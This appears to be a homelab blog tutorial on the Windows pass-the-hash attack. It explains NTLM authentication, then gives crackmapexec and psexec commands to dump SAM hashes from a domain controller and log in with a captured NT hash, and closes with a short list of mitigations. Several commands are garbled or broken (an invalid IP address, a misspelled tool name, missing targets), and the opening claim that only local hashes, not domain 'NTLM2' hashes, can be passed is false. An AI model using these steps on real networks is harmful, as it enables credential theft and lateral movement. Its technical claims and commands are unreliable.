Pass the hash

  • AD
  • Windows-server

posted on 10 Jul 2022 under category Active-Directory in series Active_Directory

Pass the Hash Overview

This attack only works with local SAM hashes(NTLM) and not Domain hashes(NTLM2). Since many administrators use the same passwords for both local and domain accounts it is possible to login to a domain controller and other high value systems using only local hashes.

Pass the hash is a technique used to steal credentials and enable lateral movement within a target network. In Windows networks, the challenge-response model used by NTLM security is abused to enable a malicious user to authenticate as a valid domain user without knowing their password. Even though Kerberos has replaced NTLM as the preferred authentication method for Windows domains, NTLM is still enabled in many Windows domains for compatibility reasons. And so, pass the hash attacks remain an effective tool in the hands of skilled attackers.

How NTLM authentication works

  1. The user enter his username and password.
  2. The client software generates a hash of password (and discards the cleartext password).
  3. The username is sent to the target system requesting authentication.
  4. A security challenge is returned which the client encrypts using the password hash and then sends back.
  5. The target system passes the encrypted response to the Domain Controller who also encrypts the challenge with its copy of the user’s password hash – if it matches then the user is authenticated

Pass the Hash Attack

Get NTLM Hash

  • Installing crackmapexec
apt install crackmapexec
  • Dumping Hashes with DC/username:password@DCip homelab.local/superman:'Password123!'@192.1168.1.2

Desktop View

  • admin NTLM hash
  • syntax (uid:rid:lmhash:nthash)
Dumping local SAM hashes **(uid:rid:lmhash:nthash)**


Administrator -> 3b5edb4ae7153d3871522857b2bd1e60

Pass NTLM Hash

crakmapexec DC-IP -u "username" -H ntlm  --local

crakmapexec -u Administrator -H 3b5edb4ae7153d3871522857b2bd1e60 --local

Desktop View

  • Using Psexec Tool "Username"@DC-IP -hashes Lmhash:NThash Administrator@ Lmhash:NThash aad3b435b51404eeaad3b435b51404ee:3b5edb4ae7153d3871522857b2bd1e60

Desktop View

Pass Hash Attack Mitigations

Hard to completely prevent, but we can make it more difficult on an attacker:

  • Limit account re-use:
  • Avoid re-using local admin password
  • Disable Guest and Administrator accounts
  • Limit who is a local administrator (least privilege)
  • Utilize strong passwords:
  • The longer the better (>14 characters)
  • Avoid using common words
  • I like long sentences
  • Privilege Access Management (PAM)
  • Check out/in sensitive accounts when needed
  • Automatically rotate passwords on check out and check in